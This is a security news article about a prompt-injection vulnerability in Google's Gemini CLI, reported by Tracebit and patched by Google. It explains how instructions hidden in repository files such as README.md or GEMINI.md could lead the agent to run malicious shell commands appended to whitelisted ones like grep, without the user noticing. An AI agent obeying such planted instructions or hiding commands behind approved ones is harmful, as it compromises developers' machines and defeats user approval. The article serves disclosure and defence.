The flaw, discovered just two days after the tool’s release, highlights growing security concerns around AI-powered development tools.
On June 27, 2025, Tracebit reported the vulnerability to Google’s Vulnerability Disclosure Program (VDP), merely two days after Gemini CLI’s initial release on June 25.
The security flaw was initially classified by Google as a P2/S4 issue but was later escalated to P1/S1 status, indicating its critical severity.
The vulnerability exploited a “toxic combination of improper validation, prompt injection and misleading UX” that allowed attackers to execute arbitrary commands when users inspected untrusted code repositories.
Most concerning was the attack’s stealth nature – malicious commands could execute completely undetected by the victim.
The attack leveraged Gemini CLI’s ability to execute shell commands through its run_shell_command tool and its support for context files like GEMINI.md.
Attackers could hide malicious instructions within seemingly benign files, such as README.md files containing the GNU Public License text, where few users would read beyond the opening lines.
The exploitation involved a two-stage process: first, tricking users into whitelisting innocuous commands like grep, then executing malicious commands masquerading as the whitelisted ones.
Due to insufficient validation logic in comparing shell inputs to the command whitelist, attackers could append malicious payloads to legitimate commands.
Google responded swiftly to the disclosure, releasing version 0.1.14 on July 25 with comprehensive fixes.
The company emphasized that its security model centers on “robust, multi-layered sandboxing” with Docker, Podman, and macOS Seatbelt integrations.
Several security researchers independently discovered similar vulnerabilities during the month between release and patch, underscoring the severity of the issue.
The fixed version now clearly displays malicious commands to users and requires explicit approval for additional binaries.
This incident reflects broader challenges in AI tool security as development teams rapidly adopt LLM-powered assistants.
Tracebit, which specializes in deception technology and security canaries, noted that “teams are moving very quickly to unlock and leverage the power of LLMs” but warned that “Prompt Injection doesn’t seem to be going away any time soon”.
The company’s customers, including major firms like Docker, Riot Games, and Cresta, have praised Tracebit’s approach to threat detection through automated canary deployment.
As AI tools become increasingly prevalent in development workflows, this discovery emphasizes the critical need for robust security measures and careful validation of AI-generated actions.
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates
The post Gemini CLI Vulnerability Allows Attackers to Execute Malicious Commands Silently on Developer Systems appeared first on Cyber Security News.
Looking to expand your home gym on the cheap? For this week only, one of…
The Dungeon Crawler Carl books are having a moment right now. Matt Dinniman's popular LitRPG…
Air Bud is dead. Long live Air Bud! The first footage from Air Bud Returns…
Bluetti is well known for its high quality yet affordable power stations and solar generators.…
INDIANAPOLIS, Ind. (WOWO) — The Indianapolis Metropolitan Police Department made multiple arrests and seized an…
EVANSVILLE, Ind. (WOWO) — The Evansville City Council on Monday passed a resolution by a…
This website uses cookies.